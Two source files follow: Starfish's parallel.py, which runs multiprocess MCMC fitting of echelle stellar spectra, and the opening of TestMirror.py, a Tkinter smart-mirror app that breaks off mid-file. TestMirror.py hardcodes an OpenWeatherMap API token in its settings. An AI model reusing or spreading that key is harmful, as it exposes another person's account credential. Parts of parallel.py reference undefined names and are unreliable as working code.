parallel.py
|
# Parallel implementation for sampling a multi-order echelle spectrum.
# Because the likelihood calculation is independent for each order, the
# runtime stays essentially constant as the spectral range grows, provided enough cores are available.
# Additionally, one could use this to fit multiple stars at once.
# parallel.py is meant to be imported by other modules, which then drive the objects it defines.
# It has an argparser because I think it's the easiest way to consolidate all of the
# parameters into one place, but I'm open to new suggestions.
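# A minimal driver sketch (hypothetical; the importing script and the `theta`
# proposal object below are assumptions, not part of this module):
#
#   import parallel
#   model = parallel.SampleThetaPhi(debug=True)
#   pconns, cconns, ps = parallel.initialize(model)
#   for pconn in pconns.values():
#       pconn.send(("LNPROB", theta))   # theta would be a ThetaParam proposal
#   lnprob = sum(pconn.recv() for pconn in pconns.values())
#   for pconn in pconns.values():
#       pconn.send(("DECIDE", True))    # True accepts; False reverts each order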
import argparse
parser = argparse.ArgumentParser(prog="parallel.py", description="Run Starfish fitting model in parallel.")
parser.add_argument("-r", "--run_index", help="All data will be written into this directory, overwriting any that exists. Default is current working directory.")
# Even though these arguments aren't being used, we need to add them.
parser.add_argument("--generate", action="store_true", help="Write out the data, mean model, and residuals for each order.")
parser.add_argument("--initPhi", action="store_true", help="Create *phi.json files for each order using values in config.yaml")
parser.add_argument("--optimize", choices=["Theta", "Phi", "Cheb"], help="Optimize the Theta or Phi parameters, keeping the alternate set of parameters fixed.")
parser.add_argument("--sample", choices=["ThetaCheb", "ThetaPhi", "ThetaPhiLines"], help="Sample the parameters, keeping the alternate set of parameters fixed.")
parser.add_argument("--samples", type=int, default=5, help="How many samples to run?")
parser.add_argument("--incremental_save", type=int, default=0, help="How often to save incremental progress of MCMC samples.")
parser.add_argument("--use_cov", action="store_true", help="Use the local optimal jump matrix if present.")
args = parser.parse_args()
from multiprocessing import Process, Pipe
import os
import numpy as np
import Starfish
import Starfish.grid_tools
from Starfish.samplers import StateSampler
from Starfish.spectrum import DataSpectrum, Mask, ChebyshevSpectrum
from Starfish.emulator import Emulator
import Starfish.constants as C
from Starfish.covariance import get_dense_C, make_k_func, make_k_func_region
from Starfish.model import ThetaParam, PhiParam
from scipy.special import j1
from scipy.interpolate import InterpolatedUnivariateSpline
from scipy.linalg import cho_factor, cho_solve
from numpy.linalg import slogdet
from astropy.stats import sigma_clip
import gc
import logging
from itertools import chain
from collections import deque
from operator import itemgetter
import yaml
import shutil
import json
def init_directories(run_index=None):
'''
If we are sampling, we need to set up output directories to store the samples
and other output products. Since we will probably be running multiple chains at
once, set things up so that they don't conflict.
:returns: routdir, the outdir for this current run.
'''
base = Starfish.outdir + Starfish.name + "/run{:0>2}/"
if run_index is None:
run_index = 0
while os.path.exists(base.format(run_index)):
print(base.format(run_index), "exists")
run_index += 1
routdir = base.format(run_index)
else:
routdir = base.format(run_index)
#Delete this routdir, if it exists
if os.path.exists(routdir):
print("Deleting", routdir)
shutil.rmtree(routdir)
print("Creating ", routdir)
os.makedirs(routdir)
# Copy yaml file to routdir for archiving purposes
shutil.copy("config.yaml", routdir + "config.yaml")
# Create subdirectories
for model_number in range(len(Starfish.data["files"])):
for order in Starfish.data["orders"]:
order_dir = routdir + Starfish.specfmt.format(model_number, order)
print("Creating ", order_dir)
os.makedirs(order_dir)
return routdir
if args.run_index:
Starfish.routdir = init_directories(args.run_index)
else:
Starfish.routdir = ""
# list of keys from 0 to (norders - 1)
order_keys = np.arange(len(Starfish.data["orders"]))
DataSpectra = [DataSpectrum.open(os.path.expandvars(file), orders=Starfish.data["orders"]) for file in Starfish.data["files"]]
# list of keys from 0 to (nspectra - 1) Used for indexing purposes.
spectra_keys = np.arange(len(DataSpectra))
#Instruments are provided as one per dataset
Instruments = [getattr(Starfish.grid_tools, inst)() for inst in Starfish.data["instruments"]]
masks = Starfish.config.get("mask", None)
if masks is not None:
for mask, dataSpec in zip(masks, DataSpectra):
myMask = Mask(mask, orders=Starfish.data["orders"])
dataSpec.add_mask(myMask.masks)
# Set up the logger
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", filename="{}log.log".format(
Starfish.routdir), level=logging.DEBUG, filemode="w", datefmt='%m/%d/%Y %I:%M:%S %p')
#
# def perturb(startingDict, jumpDict, factor=3.):
# '''
# Given a starting parameter dictionary loaded from a config file, perturb the
# values as a multiple of the jump distribution. This is designed so that
# not all chains start at exactly the same place.
#
# Modifies the startingDict
# '''
# for key in startingDict.keys():
# startingDict[key] += factor * np.random.normal(loc=0, scale=jumpDict[key])
#
# fix_logg = config.get("fix_logg", None)
# Updating specific covariances to speed mixing
if Starfish.config.get("use_cov", None):
# Use an empirically determined covariance matrix for the jumps.
pass
def info(title):
'''
Print process information useful for debugging.
'''
print(title)
print('module name:', __name__)
if hasattr(os, 'getppid'): # only available on Unix
print('parent process:', os.getppid())
print('process id:', os.getpid())
class Order:
def __init__(self, debug=False):
'''
This object contains all of the variables necessary for the partial
lnprob calculation for one echelle order. It is designed to first be
instantiated within the main processes and then forked to other
subprocesses. Once operating in the subprocess, the variables specific
to the order are loaded with an `INIT` message call, which tells which key
to initialize on in the `self.initialize()`.
'''
self.lnprob = -np.inf
self.lnprob_last = -np.inf
self.func_dict = {"INIT": self.initialize,
"DECIDE": self.decide_Theta,
"INST": self.instantiate,
"LNPROB": self.lnprob_Theta,
"GET_LNPROB": self.get_lnprob,
"FINISH": self.finish,
"SAVE": self.save,
"OPTIMIZE_CHEB": self.optimize_Cheb
}
self.debug = debug
self.logger = logging.getLogger("{}".format(self.__class__.__name__))
def initialize(self, key):
'''
Initialize to the correct chunk of data (echelle order).
:param key: (spectrum_id, order_key)
:param type: (int, int)
This method should only be called after all subprocesses have been forked.
'''
self.id = key
spectrum_id, self.order_key = self.id
# Make sure these are ints
self.spectrum_id = int(spectrum_id)
self.instrument = Instruments[self.spectrum_id]
self.dataSpectrum = DataSpectra[self.spectrum_id]
self.wl = self.dataSpectrum.wls[self.order_key]
self.fl = self.dataSpectrum.fls[self.order_key]
self.sigma = self.dataSpectrum.sigmas[self.order_key]
self.ndata = len(self.wl)
self.mask = self.dataSpectrum.masks[self.order_key]
self.order = int(self.dataSpectrum.orders[self.order_key])
self.logger = logging.getLogger("{} {}".format(self.__class__.__name__, self.order))
if self.debug:
self.logger.setLevel(logging.DEBUG)
else:
self.logger.setLevel(logging.INFO)
self.logger.info("Initializing model on Spectrum {}, order {}.".format(self.spectrum_id, self.order_key))
self.npoly = Starfish.config["cheb_degree"]
self.chebyshevSpectrum = ChebyshevSpectrum(self.dataSpectrum, self.order_key, npoly=self.npoly)
# If the file exists, optionally initialize to the stored Chebyshev values
fname = Starfish.specfmt.format(self.spectrum_id, self.order) + "phi.json"
if os.path.exists(fname):
self.logger.debug("Loading stored Chebyshev parameters.")
phi = PhiParam.load(fname)
self.chebyshevSpectrum.update(phi.cheb)
self.resid_deque = deque(maxlen=500) #Deque that stores the last residual spectra, for averaging
self.counter = 0
self.emulator = Emulator.open()
self.emulator.determine_chunk_log(self.wl)
self.pca = self.emulator.pca
self.wl_FFT = self.pca.wl
# The raw eigenspectra and mean flux components
self.EIGENSPECTRA = np.vstack((self.pca.flux_mean[np.newaxis,:], self.pca.flux_std[np.newaxis,:], self.pca.eigenspectra))
self.ss = np.fft.rfftfreq(self.pca.npix, d=self.emulator.dv)
self.ss[0] = 0.01 # junk so we don't get a divide by zero error
# Holders to store the convolved and resampled eigenspectra
self.eigenspectra = np.empty((self.pca.m, self.ndata))
self.flux_mean = np.empty((self.ndata,))
self.flux_std = np.empty((self.ndata,))
self.sigma_mat = self.sigma**2 * np.eye(self.ndata)
self.mus, self.C_GP, self.data_mat = None, None, None
self.lnprior = 0.0 # Modified and set by NuisanceSampler.lnprob
# self.nregions = 0
# self.exceptions = []
# Update the outdir based upon id
self.noutdir = Starfish.routdir + "{}/{}/".format(self.spectrum_id, self.order)
def instantiate(self, *args):
'''
If mixing Theta and Phi optimization/sampling, perform the sigma clipping
operation to instantiate covariant regions to cover outliers.
May involve creating a new NuisanceSampler.
'''
raise NotImplementedError
def get_lnprob(self, *args):
'''
Return the *current* value of lnprob.
Intended to be called from the master process to
query the child processes for their current value of lnprob.
'''
return self.lnprob
def lnprob_Theta(self, p):
'''
Update the model to the Theta parameters and then evaluate the lnprob.
Intended to be called from the master process via the command "LNPROB".
'''
try:
self.update_Theta(p)
lnp = self.evaluate() # Also sets self.lnprob to new value
return lnp
except C.ModelError:
self.logger.debug("ModelError in stellar parameters, sending back -np.inf {}".format(p))
return -np.inf
def evaluate(self):
'''
Return the lnprob using the current version of the C_GP matrix, data matrix,
and other intermediate products.
'''
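# What follows evaluates a multivariate Gaussian likelihood in the residuals R:
# X projects the emulator weights into the data space (Chebyshev-corrected and
# scaled by flux_std), CC = X C_GP X^T + data_mat is the full covariance, and
# lnprob = -0.5 * (R^T CC^{-1} R + ln det CC), computed via a Cholesky factorization.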
self.lnprob_last = self.lnprob
X = (self.chebyshevSpectrum.k * self.flux_std * np.eye(self.ndata)).dot(self.eigenspectra.T)
CC = X.dot(self.C_GP.dot(X.T)) + self.data_mat
try:
factor, flag = cho_factor(CC)
except np.linalg.LinAlgError:
print("Spectrum:", self.spectrum_id, "Order:", self.order)
self.CC_debugger(CC)
raise
try:
R = self.fl - self.chebyshevSpectrum.k * self.flux_mean - X.dot(self.mus)
logdet = np.sum(2 * np.log((np.diag(factor))))
self.lnprob = -0.5 * (np.dot(R, cho_solve((factor, flag), R)) + logdet)
self.logger.debug("Evaluating lnprob={}".format(self.lnprob))
return self.lnprob
# To give us some debugging information about what went wrong.
except np.linalg.LinAlgError:
print("Spectrum:", self.spectrum_id, "Order:", self.order)
raise
def CC_debugger(self, CC):
'''
Special debugging information for the covariance matrix decomposition.
'''
print('{:-^60}'.format('CC_debugger'))
print("See https://github.com/iancze/Starfish/issues/26")
print("Covariance matrix at a glance:")
if (CC.diagonal().min() < 0.0):
print("- Negative entries on the diagonal:")
print("\t- Check sigAmp: should be positive")
print("\t- Check uncertainty estimates: should all be positive")
elif np.any(np.isnan(CC.diagonal())):
print("- Covariance matrix has a NaN value on the diagonal")
else:
if not np.allclose(CC, CC.T):
print("- The covariance matrix is highly asymmetric")
#Still might have an asymmetric matrix below `allclose` threshold
evals_CC, evecs_CC = np.linalg.eigh(CC)
n_neg = (evals_CC < 0).sum()
n_tot = len(evals_CC)
print("- There are {} negative eigenvalues out of {}.".format(n_neg, n_tot))
mark = lambda val: '>' if val < 0 else '.'
print("Covariance matrix eigenvalues:")
print(*["{: >6} {:{fill}>20.3e}".format(i, evals_CC[i],
fill=mark(evals_CC[i])) for i in range(10)], sep='\n')
print('{: >15}'.format('...'))
print(*["{: >6} {:{fill}>20.3e}".format(n_tot-10+i, evals_CC[-10+i],
fill=mark(evals_CC[-10+i])) for i in range(10)], sep='\n')
print('{:-^60}'.format('-'))
def update_Theta(self, p):
'''
Update the model to the current Theta parameters.
:param p: parameters to update model to
:type p: model.ThetaParam
'''
# Dirty HACK to get a fixed logg:
# if `fix_logg` is set in config.yaml, pin the second grid parameter to that value.
fix_logg = Starfish.config.get("fix_logg", None)
if fix_logg is not None:
p.grid[1] = fix_logg
print("grid pars are", p.grid)
self.logger.debug("Updating Theta parameters to {}".format(p))
# Store the current accepted values before overwriting with new proposed values.
self.flux_mean_last = self.flux_mean.copy()
self.flux_std_last = self.flux_std.copy()
self.eigenspectra_last = self.eigenspectra.copy()
self.mus_last = self.mus
self.C_GP_last = self.C_GP
# Local, shifted copy of wavelengths
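# (shifted by the relativistic Doppler factor sqrt((c + vz) / (c - vz)) for radial velocity vz)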
wl_FFT = self.wl_FFT * np.sqrt((C.c_kms + p.vz) / (C.c_kms - p.vz))
# If vsini is less than 0.2 km/s, we might run into issues with
# the grid spacing. Therefore skip the convolution step if we have
# values smaller than this.
# FFT and convolve operations
if p.vsini < 0.0:
raise C.ModelError("vsini must be positive")
elif p.vsini < 0.2:
# Skip the vsini taper; the grid spacing cannot resolve such small values
eigenspectra_full = self.EIGENSPECTRA.copy()
else:
FF = np.fft.rfft(self.EIGENSPECTRA, axis=1)
# Determine the stellar broadening kernel
ub = 2. * np.pi * p.vsini * self.ss
sb = j1(ub) / ub - 3 * np.cos(ub) / (2 * ub ** 2) + 3. * np.sin(ub) / (2 * ub ** 3)
# set zeroth frequency to 1 separately (DC term)
sb[0] = 1.
# apply the vsini taper
FF_tap = FF * sb
# do ifft
eigenspectra_full = np.fft.irfft(FF_tap, self.pca.npix, axis=1)
# Spectrum resample operations
if min(self.wl) < min(wl_FFT) or max(self.wl) > max(wl_FFT):
raise RuntimeError("Data wl grid ({:.2f},{:.2f}) must fit within the range of wl_FFT ({:.2f},{:.2f})".format(min(self.wl), max(self.wl), min(wl_FFT), max(wl_FFT)))
# Take the output from the FFT operation (eigenspectra_full), and stuff them
# into respective data products
for lres, hres in zip(chain([self.flux_mean, self.flux_std], self.eigenspectra), eigenspectra_full):
interp = InterpolatedUnivariateSpline(wl_FFT, hres, k=5)
lres[:] = interp(self.wl)
del interp
# Helps keep memory usage low, seems like the numpy routine is slow
# to clear allocated memory for each iteration.
gc.collect()
# Adjust flux_mean and flux_std by Omega
Omega = 10**p.logOmega
self.flux_mean *= Omega
self.flux_std *= Omega
# Now update the parameters from the emulator
# If pars are outside the grid, Emulator will raise C.ModelError
self.emulator.params = p.grid
self.mus, self.C_GP = self.emulator.matrix
def revert_Theta(self):
'''
Revert the status of the model from a rejected Theta proposal.
'''
self.logger.debug("Reverting Theta parameters")
self.lnprob = self.lnprob_last
self.flux_mean = self.flux_mean_last
self.flux_std = self.flux_std_last
self.eigenspectra = self.eigenspectra_last
self.mus = self.mus_last
self.C_GP = self.C_GP_last
def decide_Theta(self, yes):
'''
Interpret the decision from the master process to either revert the
Theta model (rejected parameters) or move on (accepted parameters).
:param yes: if True, accept stellar parameters.
:type yes: boolean
'''
if yes:
# accept and move on
self.logger.debug("Deciding to accept Theta parameters")
else:
# revert and move on
self.logger.debug("Deciding to revert Theta parameters")
self.revert_Theta()
# Proceed with independent sampling
self.independent_sample(1)
def optimize_Cheb(self, *args):
'''
Keeping the current Theta parameters fixed and assuming white noise,
optimize the Chebyshev parameters
'''
if self.chebyshevSpectrum.fix_c0:
p0 = np.zeros((self.npoly - 1))
self.fix_c0 = True
else:
p0 = np.zeros((self.npoly))
self.fix_c0 = False
def fprob(p):
self.chebyshevSpectrum.update(p)
lnp = self.evaluate()
print(self.order, p, lnp)
if lnp == -np.inf:
return 1e99
else:
return -lnp
from scipy.optimize import fmin
result = fmin(fprob, p0, maxiter=10000, maxfun=10000)
print(self.order, result)
# Due to a JSON bug, np.int64 type objects will get read twice,
# and cause this routine to fail. Therefore we have to be careful
# to convert these to ints.
phi = PhiParam(spectrum_id=int(self.spectrum_id), order=int(self.order), fix_c0=self.chebyshevSpectrum.fix_c0, cheb=result)
phi.save()
def update_Phi(self, p):
'''
Update the Phi parameters and data covariance matrix.
:param params: large dictionary containing cheb, cov, and regions
'''
raise NotImplementedError
def revert_Phi(self, *args):
'''
Revert all products from the nuisance parameters, including the data
covariance matrix.
'''
self.logger.debug("Reverting Phi parameters")
self.lnprob = self.lnprob_last
self.chebyshevSpectrum.revert()
self.data_mat = self.data_mat_last
def clear_resid_deque(self):
'''
Clear the accumulated residual spectra.
'''
self.resid_deque.clear()
def independent_sample(self, niter):
'''
Do the independent sampling specific to this echelle order, using the
attached self.sampler (NuisanceSampler).
:param niter: number of iterations to complete before returning to master process.
'''
self.logger.debug("Beginning independent sampling on Phi parameters")
if self.lnprob:
# If we have a current value, pass it to the sampler
self.p0, self.lnprob, state = self.sampler.run_mcmc(pos0=self.p0, N=niter, lnprob0=self.lnprob)
else:
# Otherwise, start from the beginning
self.p0, self.lnprob, state = self.sampler.run_mcmc(pos0=self.p0, N=niter)
self.logger.debug("Finished independent sampling on Phi parameters")
# Don't return anything to the master process.
def finish(self, *args):
'''
Wrap up the sampling and write the samples to disk.
'''
self.logger.debug("Finishing")
def brain(self, conn):
'''
The infinite loop of the subprocess, which continues to listen for
messages on the pipe.
'''
self.conn = conn
alive = True
while alive:
#Keep listening for messages put on the Pipe
alive = self.interpret()
#Once self.interpret() returns `False`, this loop will die.
self.conn.send("DEAD")
def interpret(self):
'''
Interpret the messages being put into the Pipe, and do something with
them. Messages are always sent in a 2-arg tuple (fname, arg)
Right now we only expect one function and one argument but this could
be generalized to **args.
'''
#info("brain")
fname, arg = self.conn.recv() # Waits here to receive a new message
self.logger.debug("{} received message {}".format(os.getpid(), (fname, arg)))
func = self.func_dict.get(fname, False)
if func:
response = func(arg)
else:
self.logger.info("Given an unknown function {}, assuming kill signal.".format(fname))
return False
# Functions only return a response other than None when they want them
# communicated back to the master process.
# Some commands sent to the child processes do not require a response
# to the main process.
if response:
self.logger.debug("{} sending back {}".format(os.getpid(), response))
self.conn.send(response)
return True
def save(self, *args):
'''
Using the current values for flux, write out the data, mean model, and mean
residuals into a JSON.
'''
X = (self.chebyshevSpectrum.k * self.flux_std * np.eye(self.ndata)).dot(self.eigenspectra.T)
model = self.chebyshevSpectrum.k * self.flux_mean + X.dot(self.mus)
resid = self.fl - model
my_dict = {"wl":self.wl.tolist(), "data":self.fl.tolist(), "model":model.tolist(), "resid":resid.tolist(), "sigma":self.sigma.tolist(), "spectrum_id":self.spectrum_id, "order":self.order}
fname = Starfish.specfmt.format(self.spectrum_id, self.order)
f = open(fname + "spec.json", 'w')
json.dump(my_dict, f, indent=2, sort_keys=True)
f.close()
class OptimizeTheta(Order):
def initialize(self, key):
super().initialize(key)
# Any additional setup here
# for now, just use white noise
self.data_mat = self.sigma_mat.copy()
class OptimizeCheb(Order):
def initialize(self, key):
super().initialize(key)
# Any additional setup here
# for now, just use white noise
self.data_mat = self.sigma_mat.copy()
class OptimizePhi(Order):
def __init__(self):
pass
class SampleThetaCheb(Order):
def initialize(self, key):
super().initialize(key)
# for now, just use white noise
self.data_mat = self.sigma_mat.copy()
self.data_mat_last = self.data_mat.copy()
#Set up p0 and the independent sampler
fname = Starfish.specfmt.format(self.spectrum_id, self.order) + "phi.json"
phi = PhiParam.load(fname)
self.p0 = phi.cheb
cov = np.diag(Starfish.config["cheb_jump"]**2 * np.ones(len(self.p0)))
def lnfunc(p):
# turn this into pars
self.update_Phi(p)
lnp = self.evaluate()
self.logger.debug("Evaluated Phi parameters: {} {}".format(p, lnp))
return lnp
def rejectfn():
self.logger.debug("Calling Phi revertfn.")
self.revert_Phi()
self.sampler = StateSampler(lnfunc, self.p0, cov, query_lnprob=self.get_lnprob, rejectfn=rejectfn, debug=True)
def update_Phi(self, p):
'''
Update the Chebyshev coefficients only.
'''
self.chebyshevSpectrum.update(p)
def finish(self, *args):
super().finish(*args)
fname = Starfish.routdir + Starfish.specfmt.format(self.spectrum_id, self.order) + "/mc.hdf5"
self.sampler.write(fname=fname)
class SampleThetaPhi(Order):
def initialize(self, key):
# Run through the standard initialization
super().initialize(key)
# for now, start with white noise
self.data_mat = self.sigma_mat.copy()
self.data_mat_last = self.data_mat.copy()
#Set up p0 and the independent sampler
fname = Starfish.specfmt.format(self.spectrum_id, self.order) + "phi.json"
phi = PhiParam.load(fname)
# Set the regions to None, since we don't want to include them even if they
# are there
phi.regions = None
#Loading file that was previously output
# Convert PhiParam object to an array
self.p0 = phi.toarray()
jump = Starfish.config["Phi_jump"]
cheb_len = (self.npoly - 1) if self.chebyshevSpectrum.fix_c0 else self.npoly
cov_arr = np.concatenate((Starfish.config["cheb_jump"]**2 * np.ones((cheb_len,)), np.array([jump["sigAmp"], jump["logAmp"], jump["l"]])**2 ))
cov = np.diag(cov_arr)
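# The jump vector is laid out as [cheb coefficients..., sigAmp, logAmp, l]
# (matching how lnfunc unpacks p below); cov is the corresponding diagonal
# Metropolis-Hastings proposal covariance built from config.yaml.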
def lnfunc(p):
# Convert p array into a PhiParam object
ind = self.npoly
if self.chebyshevSpectrum.fix_c0:
ind -= 1
cheb = p[0:ind]
sigAmp = p[ind]
ind+=1
logAmp = p[ind]
ind+=1
l = p[ind]
par = PhiParam(self.spectrum_id, self.order, self.chebyshevSpectrum.fix_c0, cheb, sigAmp, logAmp, l)
self.update_Phi(par)
# sigAmp must be positive (this is effectively a prior)
# See https://github.com/iancze/Starfish/issues/26
if not (0.0 < sigAmp):
self.lnprob_last = self.lnprob
lnp = -np.inf
self.logger.debug("sigAmp was negative, returning -np.inf")
self.lnprob = lnp # Same behavior as self.evaluate()
else:
lnp = self.evaluate()
self.logger.debug("Evaluated Phi parameters: {} {}".format(par, lnp))
return lnp
def rejectfn():
self.logger.debug("Calling Phi revertfn.")
self.revert_Phi()
self.sampler = StateSampler(lnfunc, self.p0, cov, query_lnprob=self.get_lnprob, rejectfn=rejectfn, debug=True)
def update_Phi(self, p):
self.logger.debug("Updating nuisance parameters to {}".format(p))
# Read off the Chebyshev parameters and update
self.chebyshevSpectrum.update(p.cheb)
# Check to make sure the global covariance parameters make sense
#if p.sigAmp < 0.1:
# raise C.ModelError("sigAmp shouldn't be lower than 0.1, something is wrong.")
max_r = 6.0 * p.l # [km/s]
# Create a partial function which returns the proper element.
k_func = make_k_func(p)
# Store the previous data matrix in case we want to revert later
self.data_mat_last = self.data_mat
self.data_mat = get_dense_C(self.wl, k_func=k_func, max_r=max_r) + p.sigAmp*self.sigma_mat
def finish(self, *args):
super().finish(*args)
fname = Starfish.routdir + Starfish.specfmt.format(self.spectrum_id, self.order) + "/mc.hdf5"
self.sampler.write(fname=fname)
class SampleThetaPhiLines(Order):
def initialize(self, key):
# Run through the standard initialization
super().initialize(key)
# for now, start with white noise
self.data_mat = self.sigma_mat.copy()
self.data_mat_last = self.data_mat.copy()
#Set up p0 and the independent sampler
fname = Starfish.specfmt.format(self.spectrum_id, self.order) + "phi.json"
phi = PhiParam.load(fname)
# print("Phi.regions", phi.regions)
# import sys
# sys.exit()
# Get the regions matrix
region_func = make_k_func_region(phi)
max_r = 4.0 * np.max(phi.regions, axis=0)[2]
self.region_mat = get_dense_C(self.wl, k_func=region_func, max_r=max_r)
print(self.region_mat)
# Then set phi to None
phi.regions = None
#Loading file that was previously output
# Convert PhiParam object to an array
self.p0 = phi.toarray()
jump = Starfish.config["Phi_jump"]
cheb_len = (self.npoly - 1) if self.chebyshevSpectrum.fix_c0 else self.npoly
cov_arr = np.concatenate((Starfish.config["cheb_jump"]**2 * np.ones((cheb_len,)), np.array([jump["sigAmp"], jump["logAmp"], jump["l"]])**2 ))
cov = np.diag(cov_arr)
def lnfunc(p):
# Convert p array into a PhiParam object
ind = self.npoly
if self.chebyshevSpectrum.fix_c0:
ind -= 1
cheb = p[0:ind]
sigAmp = p[ind]
ind+=1
logAmp = p[ind]
ind+=1
l = p[ind]
phi = PhiParam(self.spectrum_id, self.order, self.chebyshevSpectrum.fix_c0, cheb, sigAmp, logAmp, l)
self.update_Phi(phi)
lnp = self.evaluate()
self.logger.debug("Evaluated Phi parameters: {} {}".format(phi, lnp))
return lnp
def rejectfn():
self.logger.debug("Calling Phi revertfn.")
self.revert_Phi()
self.sampler = StateSampler(lnfunc, self.p0, cov, query_lnprob=self.get_lnprob, rejectfn=rejectfn, debug=True)
def update_Phi(self, phi):
self.logger.debug("Updating nuisance parameters to {}".format(phi))
# Read off the Chebyshev parameters and update
self.chebyshevSpectrum.update(phi.cheb)
# Check to make sure the global covariance parameters make sense
if phi.sigAmp < 0.1:
raise C.ModelError("sigAmp shouldn't be lower than 0.1, something is wrong.")
max_r = 6.0 * phi.l # [km/s]
# Create a partial function which returns the proper element.
k_func = make_k_func(phi)
# Store the previous data matrix in case we want to revert later
self.data_mat_last = self.data_mat
self.data_mat = get_dense_C(self.wl, k_func=k_func, max_r=max_r) + phi.sigAmp*self.sigma_mat + self.region_mat
def finish(self, *args):
super().finish(*args)
fname = Starfish.routdir + Starfish.specfmt.format(self.spectrum_id, self.order) + "/mc.hdf5"
self.sampler.write(fname=fname)
# class SampleThetaPhiLines(Order):
# def instantiate(self, *args):
# # threshold for sigma clipping
# sigma=config["sigma_clip"]
#
# # array that specifies if a pixel is already covered.
# # to start, it should be all False
# covered = np.zeros((self.ndata,), dtype='bool')
#
# #average all of the spectra in the deque together
# residual_array = np.array(self.resid_deque)
# if len(self.resid_deque) == 0:
# raise RuntimeError("No residual spectra stored yet.")
# else:
# residuals = np.average(residual_array, axis=0)
#
# # run the sigma_clip algorithm until converged, and we've identified the outliers
# filtered_data = sigma_clip(residuals, sig=sigma, iters=None)
# mask = filtered_data.mask
# wl = self.wl
#
# sigma0 = config['region_priors']['sigma0']
# logAmp = config["region_params"]["logAmp"]
# sigma = config["region_params"]["sigma"]
#
# # Sort in decreasing strength of residual
# self.nregions = 0
# regions = {}
#
# region_mus = {}
# for w, resid in sorted(zip(wl[mask], np.abs(residuals[mask])), key=itemgetter(1), reverse=True):
# if w in wl[covered]:
# continue
# else:
# # check to make sure region is not *right* at the edge of the echelle order
# if w <= np.min(wl) or w >= np.max(wl):
# continue
# else:
# # instantiate region and update coverage
#
# # Default amp and sigma values
# regions[self.nregions] = {"logAmp":logAmp, "sigma":sigma, "mu":w}
# region_mus[self.nregions] = w # for evaluating the mu prior
# self.nregions += 1
#
# # determine the stretch of wl covered by this new region
# ind = (wl >= (w - sigma0)) & (wl <= (w + sigma0))
# # update the covered regions
# covered = covered | ind
#
# # Take the current nuisance positions as a starting point, and add the regions
# starting_dict = self.sampler.params.copy()
# starting_dict["regions"] = regions
#
# region_mus = np.array([region_mus[i] for i in range(self.nregions)])
#
# # Setup the priors
# region_priors = config["region_priors"]
# region_priors.update({"mus":region_mus})
# prior_params = {"regions":region_priors}
#
# # do all this crap again
# cheb_MH_cov = float(config["cheb_jump"])**2 * np.ones((self.npoly,))
# cov_MH_cov = np.array([float(config["cov_jump"][key]) for key in self.sampler.cov_tup])**2
# region_MH_cov = [float(config["region_jump"][key])**2 for key in C.cov_region_parameters]
# regions_MH_cov = np.array([region_MH_cov for i in range(self.nregions)]).flatten()
#
# nuisance_MH_cov = np.diag(np.concatenate((cheb_MH_cov, cov_MH_cov, regions_MH_cov)))
#
# print(starting_dict)
# print("cov shape {}".format(nuisance_MH_cov.shape))
#
# # Initialize a new sampler, replacing the old one
# self.sampler = NuisanceSampler(OrderModel=self, starting_param_dict=starting_dict, cov=nuisance_MH_cov, debug=True, outdir=self.noutdir, prior_params=prior_params, order=self.order)
#
# self.p0 = self.sampler.p0
#
# # Update the nuisance parameters to the starting values so that we at least have a self.data_mat
# print("Updating nuisance parameter data products to starting values.")
# self.update_nuisance(starting_dict)
# self.lnprob = self.evaluate()
#
# # To speed up convergence, try just doing a bunch of nuisance runs before
# # going into the iteration pattern
# print("Doing nuisance burn-in for {} samples".format(config["nuisance_burn"]))
# self.independent_sample(config["nuisance_burn"])
# We create one Order() in the main process. When the process forks, each
# subprocess now has its own independent OrderModel instance.
# Then, each forked model will be customized using an INIT command passed
# through the PIPE.
def initialize(model):
# Fork a subprocess for each key: (spectra, order)
pconns = {} # Parent connections
cconns = {} # Child connections
ps = {} # Process objects
# Create all of the pipes
for spectrum_key in spectra_keys:
for order_key in order_keys:
pconn, cconn = Pipe()
key = (spectrum_key, order_key)
pconns[key], cconns[key] = pconn, cconn
p = Process(target=model.brain, args=(cconn,))
p.start()
ps[key] = p
# initialize each Model to a specific DataSpectrum and echelle order
for key, pconn in pconns.items():
pconn.send(("INIT", key))
return (pconns, cconns, ps)
def profile_code():
'''
Test hook designed to be used by cprofile or kernprof. Does not include any
network latency from communicating or synchronizing between processes
because we run on just one process.
'''
#Evaluate one complete iteration from delivery of stellar parameters from master process
#Master proposal
stellar_Starting.update({"logg":4.29})
model.stellar_lnprob(stellar_Starting)
#Assume we accepted
model.decide_stellar(True)
#Right now, assumes Kurucz order 23
def main():
# Uncomment these lines to profile
# #Initialize the current model for profiling purposes
# model.initialize((0, 0))
# import cProfile
# cProfile.run("profile_code()", "prof")
# import sys; sys.exit()
# Kill all of the orders
for pconn in pconns.values():
pconn.send(("FINISH", None))
pconn.send(("DIE", None))
# Join on everything and terminate
for p in ps.values():
p.join()
p.terminate()
import sys;sys.exit()
if __name__=="__main__":
main()
# All subprocesses will inherit pipe file descriptors created in the master process.
# http://www.pushingbits.net/posts/python-multiprocessing-with-pipes/
# thus, to really close a pipe, you need to close it in every subprocess.
|
TestMirror.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import locale
from threading import Thread
import time
import traceback
import urllib
import feedparser
try:
from Tkinter import *
import Tkinter as tk
except ImportError:
from tkinter import *
import tkinter as tk
import datetime
import pickle
import os
import os.path
import json
import requests
import dateutil.parser
import sys
import pprint
# import Adafruit_DHT #humidity tester package(can't install without raspberry pi)
#from gpiozero import MotionSensor #importing motion sensor to use with the pi
from PIL import Image, ImageTk
time_format = 12 # 12 or 24
date_format = "%b %d, %Y" # check python doc for strftime() for options
news_country_code = 'US'
weather_api_token = '822c250a4e12f332ddae25014a4fc2b2' # create account at https://openweathermap.org/
weather_city_id = '2028461' # List of city ID city.list.json.gz can be downloaded here http://bulk.openweathermap.org/sample/
weather_unit = 'metric' # For temperature in Fahrenheit use "imperial"
# For temperature in Celsius use "metric"
# Temperature in Kelvin is used by default, no need to use units parameter in API call
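# With the values above, the request assembled in Weather.get_weather() resolves to
# (token shown as a placeholder):
#   http://api.openweathermap.org/data/2.5/weather?id=2028461&units=metric&appid=<weather_api_token>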
xlarge_text_size = 94
large_text_size = 48
medium_text_size = 28
small_text_size = 18
xsmall_text_size = 14
text_font = "Roboto"
text_color = "white"
background_color = 'black'
icon_lookup = {
'01d': "assets/01d.png",
'01n': "assets/01n.png",
'02d': "assets/02d.png",
'02n': "assets/02n.png",
'03d': "assets/03d.png",
'03n': "assets/03n.png",
'04d': "assets/04d.png",
'04n': "assets/04n.png",
'09d': "assets/09d.png",
